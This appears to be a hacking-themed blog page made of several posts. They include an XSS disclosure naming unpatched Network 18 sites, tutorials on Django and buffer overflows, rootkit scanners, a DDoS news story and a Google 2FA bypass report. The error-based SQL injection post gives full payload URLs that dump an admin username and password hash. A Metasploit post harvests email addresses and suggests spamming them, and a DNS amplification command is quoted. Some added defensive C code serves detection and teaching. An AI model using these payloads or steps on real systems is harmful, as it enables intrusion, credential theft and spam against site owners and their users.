Monday

Network 18's Websites are vulnerable to cross site scripting attack

Posted by Abhijit Chatterjee on 12:21:00 AM 0 comments



Cross-site scripting (XSS) is a type of computer security vulnerability found in Web applications. XSS enables an attacker to inject client-side script into Web pages viewed by other users. The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain (a reflected or non-persistent XSS vulnerability). Lots of Indian websites are vulnerable to an attack vector listed in the OWASP Top 10: cross-site scripting, abbreviated as 'XSS'.

Here are the Network 18 websites which are vulnerable to cross-site scripting attacks.

FOUND AND REPORTED BY-

INDRANIL BANERJEE (NULL_()_VOID)

CO-FOUNDER,

OPENFIRE-SECURITY.NET




1.  In.com – top rated Indian website. Vulnerable to XSS, persistent as well as DOM based. Reported but not fixed yet.

2.  Cj.ibnlive.com – Vulnerable to XSS; has other potential threats. Reported months ago but not fixed yet.

3.  Bitztech2.in.com – Vulnerable to XSS; not reported, just published!!!

4.  Ibnlive.in.com – Vulnerable to XSS and has other threats. Reported but not fixed yet.

5.  Khabar.ibnlive.in.com – Vulnerable to XSS (persistent). Has other vulnerabilities. Reported but not fixed yet.

6.  Moneycontrol.com – N18 website!! Vulnerable to XSS (non-persistent). Has more vulnerabilities. Reported earlier but still not fixed.

7.  Poweryourtrade.moneycontrol.com – Vulnerable to XSS. REPORTED BUT NOT FIXED YET.






Here is the demonstration of the vulnerable Network 18 websites. All are reported, but still no action has been taken by the concerned authority.
No harm was done to those websites by NULL_()_VOID; it's just a random testing result which might not harm those websites but can disrupt their reputation.


I have also attached a PDF file, which was given to us by NULL_()_VOID. Please download it to know more.

DOWNLOAD :-   http://www.mediafire.com/view/?bv7s89fnor1f3cr


FILE PASSWORD:-  i-love-null-void


                                                          THANK YOU 













Tuesday

MTCMOS (multithreshold CMOS)

Posted by Abhijit Chatterjee on 4:41:00 AM 0 comments



MTCMOS:-

MTCMOS (multithreshold CMOS) circuits are an effective means to achieve lower operating voltages in digital circuits. These circuits are constructed of MOSFETs that have two different threshold voltages: some have a high Vth and others a low one. High-speed operation at low supply voltages can be achieved by using low-Vth MOSFETs to construct the logic circuits and blocking the standby leak current that arises in these logic circuits because of the low Vth with power switch transistors constructed of high-Vth MOSFETs, making it possible to apply these circuits to battery-driven devices such as wearable information equipment. A DSP (1.2 V, 20 MHz operation) that employs this technology has already been introduced in a wristwatch personal handy-phone system terminal, contributing to lower power consumption in audio signal processing.

Using FD-SOI devices to construct the MTCMOS circuits even further improves the operation speed under low-voltage conditions. By combining 250–180 nm gate FD-SOI devices and MTCMOS circuit technology, it is fully possible to implement a digital signal processing chip for a wearable terminal that operates at high speeds (100 MHz or higher) at 1 V.










THANK YOU 




Monday

C Program To Test The ENDIANNESS Of A Processor

Posted by Abhijit Chatterjee on 4:28:00 PM 0 comments



How do you write a simple C program to test the endianness of a processor? It is simple and cool: because C is a language that works close to the hardware, we can do it by compiling and running the following program.

A short C program to test the endianness of a processor.




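 #include <stdio.h>
 #include <string.h>

 int main( void )
 {
     unsigned char x[4];
     unsigned int v = 0x03020100u;
     unsigned int y;

     /* Copy the in-memory bytes of v into x (assumes a 4-byte unsigned int).
        memcpy avoids the aliasing problem of casting x to unsigned int*. */
     memcpy( x, &v, sizeof x );

     /* Rebuild the value, treating x[0] as the least significant byte. */
     y = ( ( unsigned int )( x[0] ) <<  0 ) |
         ( ( unsigned int )( x[1] ) <<  8 ) |
         ( ( unsigned int )( x[2] ) << 16 ) |
         ( ( unsigned int )( x[3] ) << 24 );

     if( y == 0x03020100u )
         printf( "little endian\n" );
     else
         printf( "big endian\n" );
     return 0;
 }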



Sunday

ERROR BASED SQL INJECTION Full Tutorial

Posted by Abhijit Chatterjee on 3:52:00 AM 0 comments




SQL Injection is the most important part of web hacking. I am not going to show you SQL injection basics, because all of you already know them. This is all about ERROR BASED SQL INJECTION. So, let's start ;)

You can use error-based SQL injection when you get any of the following errors:




a. The Used Select Statements Have Different Number Of Columns.

b. Unknown Column 1 or no columns at all (in webpage and page source)
c. Error #1604



To know the Version of database :-



Code: or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--




Url looks like :- https://www.sitename.com/...php?id=165 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--




Version of database is 5








To get the Database name:




CODE: and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)










Url looks like:- https://www.sitename.com/...php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)










so, the database name is "dkg"




To get TABLE NAMES:



CODE: and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)




URL looks like:- https://www.sitename.com/..php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

When you search for tables, keep incrementing the limit until you find the valuable table name. Example:

LIMIT 0,1

LIMIT 1,1

LIMIT 2,1

Formula: LIMIT N,1 where N is a random integer

Valuable Tables can be :- Users, Admin, user, Administrator etc.

In this case I found a valuable table at LIMIT 3,1

Found TABLE "uvp_Users"

To get COLUMNS from a specific TABLE NAME:-



CODE: and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Look at the LIMIT 0,1 & 0xTABLEHEX

You need to change your specific TABLE name to hex.
Use this site:- http://www.swingnote.com/tools/texttohex.php

Keep incrementing the value of LIMIT until you find a valuable column name. I found "Username" at LIMIT 0,1 & "Password" at LIMIT 1,1

URL looks like(for column Username):- https://www.sitename.com/..php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7576705f5573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)






URL looks like (for column Password):- https://www.sitename.com/..php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7576705f5573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)






To extract data from columns:-

CODE: and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

COLUMN_NAME replace with "Username" & "Password"

DATABASE replace with "dkg"

TABLENAME replace with "uvp_Users"




URL looks like:- https://www.sitename.com/...php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(concat(Username,0x7e,Password) as char),0x7e)) from dkg.uvp_Users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)






SUCCESS, Username:- admin

Password: 462d9cebb6479dbf66d1b965b10181a7




Now decrypt this hash, and you are done!
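Seen from the server side, every request in this tutorial carries the same few fragments (floor(rand(0)*2), group by, concat, information_schema), so they stand out in access logs. The C program below is an added example, not part of the original post: it normalises each logged query string and counts those fragments. The log lines, the /page.php and /search.php paths, the marker list and the two-marker alert threshold are assumptions made for the illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_QUERY 2048   /* longer query strings are cut here; flag those separately */

/* Fragments shared by the payloads in the post, written lower-case and
 * without whitespace because normalise() removes both. */
static const char *const MARKERS[] = {
    "floor(rand(",          /* the duplicate-key trick */
    "groupby",              /* "group by" */
    "information_schema",   /* schema enumeration */
    "concat(",
    "concat_ws(",
    "havingmin(",           /* "having min(" */
};
#define N_MARKERS (sizeof MARKERS / sizeof MARKERS[0])

/* Percent-decode src, turn '+' into a space, lower-case, drop whitespace. */
static void normalise(const char *src, char *dst, size_t dstsz)
{
    size_t n = 0;

    if (dstsz == 0)
        return;
    while (*src && n + 1 < dstsz) {
        int c = (unsigned char)*src++;
        if (c == '%' && isxdigit((unsigned char)src[0])
                     && isxdigit((unsigned char)src[1])) {
            char hex[3] = { src[0], src[1], '\0' };
            c = (int)strtol(hex, NULL, 16);
            src += 2;
        } else if (c == '+') {
            c = ' ';
        }
        if (c != 0 && !isspace(c))      /* skip decoded NUL bytes and whitespace */
            dst[n++] = (char)tolower(c);
    }
    dst[n] = '\0';
}

/* Count how many distinct markers occur in the query string of one log line. */
int score_log_line(const char *line)
{
    char raw[MAX_QUERY], norm[MAX_QUERY];
    const char *q = strchr(line, '?');
    size_t len, i;
    int score = 0;

    if (q == NULL)
        return 0;
    q++;
    len = strcspn(q, " \"");            /* the query ends at the next space or quote */
    if (len >= sizeof raw)
        len = sizeof raw - 1;
    memcpy(raw, q, len);
    raw[len] = '\0';
    normalise(raw, norm, sizeof norm);
    for (i = 0; i < N_MARKERS; i++)
        if (strstr(norm, MARKERS[i]) != NULL)
            score++;
    return score;
}

/* Alert threshold used in this example (an assumption): two or more markers. */
int is_error_based_probe(const char *line)
{
    return score_log_line(line) >= 2;
}

/* Constructed access-log lines, not real traffic; paths are placeholders. */
const char *const SAMPLES[] = {
    "203.0.113.7 - - [10/Mar/2013:03:52:01 +0000] \"GET /page.php?id=165 HTTP/1.1\" 200 5120",
    "203.0.113.9 - - [10/Mar/2013:03:52:40 +0000] \"GET /page.php?id=165%20or%201%20group%20by%20"
        "concat_ws(0x3a,version(),floor(rand(0)*2))%20having%20min(0)%20or%201-- HTTP/1.1\" 200 812",
    "203.0.113.9 - - [10/Mar/2013:03:53:02 +0000] \"GET /page.php?id=165+AND+(SELECT+1+FROM+"
        "(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+"
        "INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+"
        "FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) HTTP/1.1\" 200 840",
    "203.0.113.20 - - [10/Mar/2013:04:10:15 +0000] \"GET /search.php?q=group+by+tutorial&page=2 HTTP/1.1\" 200 9031",
};
#define N_SAMPLES (sizeof SAMPLES / sizeof SAMPLES[0])

int main(void)
{
    size_t i;

    for (i = 0; i < N_SAMPLES; i++)
        printf("%-6s score=%d  %.70s...\n",
               is_error_based_probe(SAMPLES[i]) ? "ALERT" : "ok",
               score_log_line(SAMPLES[i]), SAMPLES[i]);
    return 0;
}
```

An alert on a parameter such as id is a cue to check that the value reaches the query as a bound parameter and that database error text is never returned to the client.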




Understanding DJANGO - Create a DJANGO Project [Full Tutorial With Image]

Posted by Abhijit Chatterjee on 1:26:00 AM 0 comments





Hello all, welcome to Hacktree. In this topic, you will learn the basic concepts of Django: What is Django? Why Django? etc. So, let's start.


What is Django?


Django is a high-level web framework that simplifies website development. It is a Python framework that allows developers to quickly implement database-backed websites using dynamic web pages. Django is pronounced "JAN-go" with the "D" silent. By dynamic, we mean web pages that are built on-the-fly using data from the browser request, URL, and a database. Dynamic pages solve several different problems.

Django follows a Model View Controller (MVC) architecture to separate the data, logic, and view layers in website development. 




Why use Django?


1.      It's easy to set up a production website in no time at all.
2.      Its components or even entire websites are portable and can be used in other websites.

Understanding Models:-

Django is a Python framework. It implements a Python class, django.db.models.Model, to define data models that will be used in a website.



Configuring the settings.py File:-


Most of the website configuration that you need to implement is done in the settings.py file. When you create a new project, Django automatically adds the settings.py file to the project's root directory. This file contains the configuration for database, installed applications and numerous other configuration settings. 





Using the manage.py Utility:-


Another file that is automatically installed in each project you create is the manage.py utility.
The manage.py utility is used to perform all kinds of development, administration, and testing tasks. The best way to describe the manage.py utility is to list some of the commands you can implement:
·         startproject creates a new Django project. A directory is created for the project that includes the initial files.
·         startapp creates a new application in a Django project. A directory is created for the application that includes the initial files.
·         syncdb synchronizes data from project models to the SQL database.
·         runserver starts the development server.
·         shell launches a Python interpreter shell that has access to the Django project, including the database.
·         dbshell launches an SQL command-line client for the database.







Django Development Server:-


Start the development server using the following command at the root of your Django project:
python manage.py runserver
The best thing is that Django comes with a lightweight development HTTP server that you can use to test your website while you are developing it.



Admin Interface:-









Installing Django:-





Install the released version of Django:-


1. Install Python 2.3 or later.

2. Download the Django tarball from the following location:

http://www.djangoproject.com/download

3. Use the following command to extract the tarball:

tar xzvf Django-version.tar.gz

4. Change the directory to the Django directory created by extracting the tarball:

cd Django-version

5. Use the following command to install Django (you need to use the sudo command on Linux so that Django gets installed as the super user):

python setup.py install

sudo python setup.py install (linux)

6. Start a Python interpreter.

7. Use the following command to verify that Django is installed:

import django

django.VERSION


Install the development version of Django:-


1. Install Python 2.3 or later.

2. Install Subversion.

3. Check out the Django trunk using the following Subversion command:

svn co http://code.djangoproject.com/svn/django/trunk django_src

4. Either copy the django_src/django directory, or create a symbolic link to that directory in the Python site-packages directory to place Django in the Python path.

5. Copy django/bin/django-admin.py somewhere in the system path.

(You don't need to run setup.py because it does what was done in steps 4 and 5.)

6. Start a Python interpreter.

7. Use the following command to verify that Django is installed:

import django

django.VERSION




Create Your First Django Project:-





1. From a command prompt, change to the directory where you want to store the code for the iFriends project.


2. Create a directory called iFriends. This will be the root directory for the iFriends project.


3. Change to the iFriends directory.


4. Type the following command to create the iFriends project:

python django-admin.py startproject iFriends


The startproject command creates the following files:


· __init__.py :- is an empty file that tells Python that the website directory should be treated as a Python package.


· manage.py :- is the command-line utility that allows the administrator to start and manage the Django project.


· settings.py :- is the configuration file that controls the behavior of the Django project.


· urls.py :- is a Python file that defines the syntax and configures the behavior of the URLs that will be used to access the website.




Monday

OWASP Security Shepherd 1.2 Released

Posted by root-Dev!l on 10:15:00 PM 0 comments


Security Shepherd is a computer based training application for web application security vulnerabilities. This project strives to herd the lost sheep of the technological world back to the safe and sound ways of secure practises. Security Shepherd can be deployed as a CTF (Capture the Flag) game or as an open floor educational server.


Easy configuration to suit every use

Security Shepherd has been designed and implemented with the aim of fostering and improving security awareness among a varied skill-set demographic. This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use. Utilizing the OWASP top ten as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. The by-product of this challenge game is the acquired skill to harden a player's own environment from OWASP top ten security risks. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.

Security Shepherd's vulnerabilities are not simulated, and are instead delivered through hardened real security vulnerabilities that cannot be abused to compromise the application or its environment. Many of these levels include insufficient protections to these vulnerabilities, such as black list filters and poor security configuration. Security Shepherd includes everything you need to complete all of its levels, including the OWASP Zed Attack Proxy Project and portable browsers already configured for proxy use.



The Security Shepherd project covers the following web application security topics;


  • SQL Injection
  • Cross Site Scripting
  • Broken Authentication and Session Management
  • Cross Site Request Forgery
  • Insecure Direct Object Reference
  • Insecure Cryptographic Storage
  • Failure to Restrict URL Access
  • Unvalidated Redirects and Forwards
  • Insufficient Transport Layer Security
Download OWASP Security Shepherd 1.2

Source :- securitygeeks.net



Sunday

BASIC CONCEPT OF BUFFER OVERFLOW (PART-I)

Posted by Abhijit Chatterjee on 2:52:00 AM 0 comments



Hello all, welcome to Hacktree.
In this part we will discuss the basics of the buffer overflow concept (introduction). I will post basic to advanced levels day by day. For this tutorial you need to know basic C programming. So, let's start.

Buffer overflows have been the most common form of security vulnerability in the last ten years.
A primary example is to reveal sensitive files such as /etc/passwd and /etc/shadow (which store the user names and encrypted passwords of your users.) Once these are in his or her hands, it is possible to use a "dictionary" attack on the passwords.  Alternatively, they can have your system FTP over an infected file and run it, which can be as bad or worse. In order to do this, they need to get a "trusted" program to execute commands they specify. Usually, this is done by a "buffer overrun" attack. Typically, buffer overrun attacks are aimed at programs that implement network functions, such as Web servers and mail servers.
In the C language, a buffer overflow results in what is known as undefined behavior. Sometimes, it might crash the program. 
At first you should know the form of a stack


Example 1:-
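#include <string.h>

void function(char *str){
    char buffer[16];
    strcpy(buffer, str);          /* no length check: 255 bytes go into 16 */
}
int main(){
    char large_string[256];
    int i;
    for (i = 0; i < 255; i++){
        large_string[i] = 'A';
    }
    large_string[255] = '\0';     /* terminate so strcpy stops after 255 bytes */
    function(large_string);
    return 0;
}
When this program is run, it results in a segmentation violation.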




The return address is overwritten with ‘AAAA’ (0x41414141)
Function exits and goes to execute instruction at 0x41414141…..

Example 2:

#include <stdio.h>
#define BUFFER_SIZE  16
int
main (void)
{
char  fName[BUFFER_SIZE];  /* this defines a character string of size BUFFER_SIZE, in this case 16;
                              this string will hold up to 15 characters + a NULL */
printf ("Please enter your first name: ");  /* simply prompts the operator to enter his/her first name */
scanf ("%s", fName);     /* this will take the input, with no limit on its length */
printf ("Welcome, %s\n", fName);  /* finally print a greeting to the operator */
return 0;
}

This is a valid ANSI C code.
Now,  run our sample program:



$ ./name
Please enter your first name: Abhijit
Welcome,  Abhijit
$

Works right. OK, but what if the operator decides that his name needs to be “aljkshfhsgfjsggegdirvskdgfrifhfbsjsjjsklsifbvnbmkfkfk”? Let's see ;)
$ ./name
Please enter your first name: aljkshfhsgfjsggegdirvskdgfrifhfbsjsjjsklsifbvnbmkfkfk
Welcome, aljkshfhsgfjsggegdirvskdgfrifhfbsjsjjsklsifbvnbmkfkfk
Segmentation fault (core dumped)
$
Oops :O What happened? ;) We said that the string cannot hold more than 16 (15 + a NULL) characters, but in this case we supplied it with 55 characters. So, we just created a buffer overflow.

Now, what to do?
We use the fgets() function to solve this problem. fgets() is designed to prevent input from extending beyond the memory allocated to it. Our new program is:
#include <stdio.h>
#define BUFFER_SIZE 16
int
main (void)
{
char fName[BUFFER_SIZE];
printf ("Please enter your first name: ");
fgets (fName, sizeof(fName), stdin); 
printf ("Welcome, %s\n", fName);
return 0;
}

now run the program:
$ ./fname
Please enter your first name: Abhijit
Welcome, Abhijit


$

There are two blank lines in the output, because fgets() retains the newline character.
Let's check what happens when we input a long string ;)

$ ./fname
Please enter your first name: aljkshfhsgfjsggegdirvskdgfrifhfbsjsjjsklsifbvnbmkfkfk
Welcome, aljkshfhsgfjsgg
$

Now it takes only 15 characters + a NULL, because we are using the fgets() function.
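fgets() stops the overflow but leaves two loose ends visible in the runs above: the newline it stores, and the rest of an over-long line, which stays in the input stream and is returned by the next read. The wrapper below is an added example, not code from the original post; read_name(), sample_input() and the NAME_* codes are hypothetical names, and the input is constructed sample data fed from a temporary file instead of the keyboard.

```c
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 16   /* same size as fName in the post */

/* Result codes (hypothetical names chosen for this example). */
enum { NAME_OK = 0, NAME_TRUNCATED = 1, NAME_EOF = -1 };

/*
 * Read one line into buf, storing at most size-1 characters plus the NUL.
 *  - removes the newline that fgets() keeps,
 *  - if the line did not fit, discards the rest of it so the leftover
 *    characters are not returned by the next read,
 *  - reports whether the input was cut short.
 */
int read_name(FILE *in, char *buf, size_t size)
{
    size_t len;
    int c, extra = 0;

    if (size == 0)
        return NAME_EOF;
    if (fgets(buf, (int)size, in) == NULL) {
        buf[0] = '\0';
        return NAME_EOF;
    }

    len = strcspn(buf, "\n");
    if (buf[len] == '\n') {            /* the whole line fitted */
        buf[len] = '\0';
        return NAME_OK;
    }

    /* No newline stored: the line was too long, exactly filled the buffer,
     * or the input ended without a newline. Drain up to the end of line. */
    while ((c = fgetc(in)) != EOF && c != '\n')
        extra++;
    return extra > 0 ? NAME_TRUNCATED : NAME_OK;
}

/* Put constructed sample input in a temporary file that stands in for stdin. */
FILE *sample_input(const char *text)
{
    FILE *f = tmpfile();
    if (f != NULL) {
        fputs(text, f);
        rewind(f);
    }
    return f;
}

int main(void)
{
    /* Constructed input: the two names typed in the post, then a third line. */
    FILE *in = sample_input("Abhijit\n"
                            "aljkshfhsgfjsggegdirvskdgfrifhfbsjsjjsklsifbvnbmkfkfk\n"
                            "Chatterjee\n");
    char fName[BUFFER_SIZE];
    int rc;

    if (in == NULL)
        return 1;
    while ((rc = read_name(in, fName, sizeof fName)) != NAME_EOF) {
        if (rc == NAME_TRUNCATED)
            printf("Rejected: name longer than %d characters (kept \"%s\")\n",
                   BUFFER_SIZE - 1, fName);
        else
            printf("Welcome, %s\n", fName);
    }
    fclose(in);
    return 0;
}
```

Without the drain loop, the third read would return the tail of the long name instead of the next line.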

SO THIS IS TOO BASIC… IF YOU HAVE ANY QUESTIONS, THEN PLEASE COMMENT HERE. I WOULD LIKE TO REPLY :D









Antivirus Forensics Tools

Posted by root-Dev!l on 11:34:00 AM 0 comments

Rkhunter



Rootkit scanner is a scanning tool that assures you, to about 99.9%*, that you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits. rkhunter is a shell script which carries out various checks on the local system to try and detect known rootkits and malware.

Step 1:- Click on terminal in Backtrack 5.
Step 2:- Type rkhunter --check


Chkrootkit


chkrootkit is a tool to locally check for signs of a rootkit. It contains chkrootkit, a shell script that checks system binaries for rootkit modification. Chkrootkit is a powerful tool to scan your Linux server for Trojans.

Step 1:- Click on terminal in Backtrack 5
Step 2:- type cd ..
Step 3:- cd /pentest/forensics/chkrootkit
Step 4:- ./chkrootkit 





How to Use MSFconsole To Collect Email Addresses

Posted by root-Dev!l on 6:44:00 PM 0 comments



STEP 1 : Click on Backtrack.

STEP 2 : GOTO EXPLOITATION TOOLS.

STEP 3 : GOTO NETWORK EXPLOITATION TOOLS.

STEP 4 : GOTO METASPLOIT FRAMEWORK.

STEP 5 : OPEN msfconsole .

When msfconsole opens, type search collector at the prompt:
msf > search collector
and press Enter.

In this step, type use auxiliary/gather/search_email_collector as shown above, or copy the line from above and paste it below.



msf > use auxiliary/gather/search_email_collector



In this step, type only: show options, as shown above.
Then you have to set the domain. To set the domain, type:



Set domain <domain name>

For example: Set domain amity.edu


Now type exploit and press Enter to start the process. Your search will begin and end with a result as shown in the image below.

Now you have all the mail addresses, and you can do whatever you want:

   =>> You can save e-mail addresses. 
   =>> You can send mail to a particular addresses.
   ==> You can send spams. 
   


Friday

Biggest Cyber Attack Slows Down The WWW Ever Happened In The History Of Internet

Posted by Administrator on 3:40:00 PM 0 comments



The headlines have been apocalyptic: "Global internet slows after biggest attack in history"; "Biggest ever cyberattack slows internet for millions"; "The attack that nearly broke the internet"; "Cyber attack jams crucial infrastructure around the world".


 

So how was it for you?
According to a company called CloudFlare, which specialises in helping websites minimise the impact of online junk data attacks by effectively creating more targets and thus spreading the burden between them, this particular assault – by a Dutch hosting company, Cyberbunker, on a not-for-profit anti-spam organisation called Spamhaus – eventually escalated to cause "congestion across several major [top-level, backbone internet networks], primarily in Europe, that would have affected hundreds of millions of people ... "
Hence, presumably, the armageddon headlines. Except, as the tech website Gizmodo points out, not many people seem to have noticed: few have complained that the internet was more than usually sluggish; movie-streaming services such as Netflix did not go down; mega net-enterprises such as Amazon reported nothing unusual; organisations that monitor the health of the web "showed zero evidence of this Dutch conflict spilling over into our online backyards". Specialists contacted by the site reported that the attack, major as it was, had "a severe impact" on the websites it was directed at, but it certainly did not shake the internet to its core.

What is becoming clear is that the attack is an outgrowth of a little-known, but highly explosive war between two factions: on one side are the Internet service providers (ISPs) and Web hosts that don’t ask their clients too many questions about whether they are hosting spam and other kinds of malicious code; on the other are groups that try to name and shame the spammers, and stop them from infiltrating your inbox—or worse, your bank’s servers. This side is engaged in a massive game of virtual whack-a-mole, only one with no end in sight.
In this latest retaliatory attack, the spammers got the better of their opponents, shutting down servers and slowing down the entire Internet. One man so far has come forward, claiming to be the spokesman for the attackers—a man named Sven Olaf Kamphuis. A so-called Internet activist, Kamphuis disdains government regulation of the Internet and, at least according to his Facebook page, gays and Jews. In an interview with The Daily Beast, Kamphuis said he owns an ISP that was put on a blacklist by the Geneva-based anti-spam company Spamhaus. Companies on the blacklist are blocked by email providers and other Internet service companies, which means they’re essentially kicked off the Internet.
So Kamphuis and others on the blacklist formed an opposition group, Stophaus, and earlier this month, they launched the most powerful “distributed denial of service” (DDoS) attack in the history of the Internet. DDoS attacks flood a server with data—in this case, 300 billion bits of data per second—at a rate it can’t possibly handle, thereby shutting it down. Stophaus’s onslaught overwhelmed not just Spamhaus’s servers, but the rest of the Internet, too. Thus, Netflix users around the world were suddenly wondering why they couldn’t stream You’ve Got Mail.
“There are a lot of people who are really pissed off about this,” Kamphuis said of Spamhaus. “And we are the first to show some balls and do something about it.”
Kamphuis said he himself had nothing to do with DDoS attacks. “I am a spokesman for Stophaus,” he said. “But being in the Internet industry I cannot have anything to do with these attacks.” Kamphuis said his group decided to stop the attacks on Tuesday, but said there are other hackers, and possibly even governments, who would like to continue the assault.


The attacks on Spamhaus illustrate a larger problem with the vulnerability of systems fundamental to the architecture of the Internet, the Domain Name Servers (DNS). The high attack bandwidth is made possible because attackers are using misconfigured domain-name service (DNS) servers known as open recursive resolvers or open recursors to amplify a much smaller attack into a larger data flood.
Known as DNS reflection, the technique uses requests for a relatively large zone file that appear to be sent from the intended victim's network. According to CloudFlare, it initially recorded over 30,000 DNS resolvers that were tricked into participating in the attack. There are as many as 25 million of these open recursive resolvers at the disposal of attackers.

"In the Spamhaus case, the attacker was sending requests for the DNS zone file for ripe.net to open DNS resolvers. The attacker spoofed the CloudFlare IPs we'd issued for Spamhaus as the source in their DNS requests. The open resolvers responded with DNS zone file, generating collectively approximately 75Gbps of attack traffic. The requests were likely approximately 36 bytes long (e.g. dig ANY ripe.net @X.X.X.X +edns=0 +bufsize=4096, where X.X.X.X is replaced with the IP address of an open DNS resolver) and the response was approximately 3,000 bytes, translating to a 100x amplification factor."

It now seems that the attack is being orchestrated by a Dutch hosting company called CyberBunker. As long as it's not child porn and anything related to terrorism, CyberBunker will host it, including sending spam.  Spamhaus blacklisted CyberBunker earlier in the month.

However, the DDoS attacks have raised concerns that further escalations of the retaliatory attacks could affect banking and email systems. DDoS attacks are typically carried out to extort money from targeted organisations or as a weapon to disrupt organisations or companies in pursuit of ideological, political or personal interests.

Source: BBC, THN




Sunday

How to View Last Activity of Your PC

Posted by root-Dev!l on 12:26:00 PM 0 comments


LastActivityView is a tool for Windows operating system that collects information from various sources on a running system, and displays a log of actions made by the user and events occurred on this computer.

Here is the download link :-





Tuesday

Google's two-factor authentication bypassed

Posted by root-Dev!l on 11:58:00 PM 0 comments



Google has fixed a vulnerability which could in theory have enabled attackers to compromise Google accounts protected by two-factor authentication. However, the company did take seven months to do so.
If this security feature is activated, Google requests an additional one-time password when a user tries to log into their Google account. The one-time password is generated by a smartphone app or can be delivered by text message. The requirement for an additional authentication factor means that the account is protected from unauthorised access should the user's access credentials fall into the wrong hands – access to the mobile phone associated with the account is also required.
There is, however, an intentional backdoor for applications which are not set up for two-factor authentication in the form of application specific passwords (ASP). If, for example, you want to use Thunderbird to download email from a Google account secured using two-factor authentication, you simply generate an ASP which is submitted by Thunderbird in place of the normal password.
This has the disadvantage that an attacker who intercepts the ASP then has access to email, calendar items and contacts without requiring the one-time password. Under normal circumstances, it should not be possible to permanently take over the user's Google account (for example by changing the main password) using an ASP.
But this is exactly what security researchers from Duo Security were able to do. Using an API intended for Android, they were able to use an ASP to access account settings, change the password for the Google account and even deactivate two-factor authentication.
The researchers reported their discovery to Google last July, but the vulnerability was only fixed at the end of last week. Google now checks whether sessions attempting to access account settings were authenticated by means of an ASP and, if they were, requires additional two-factor authentication.

Source :-h-online.com

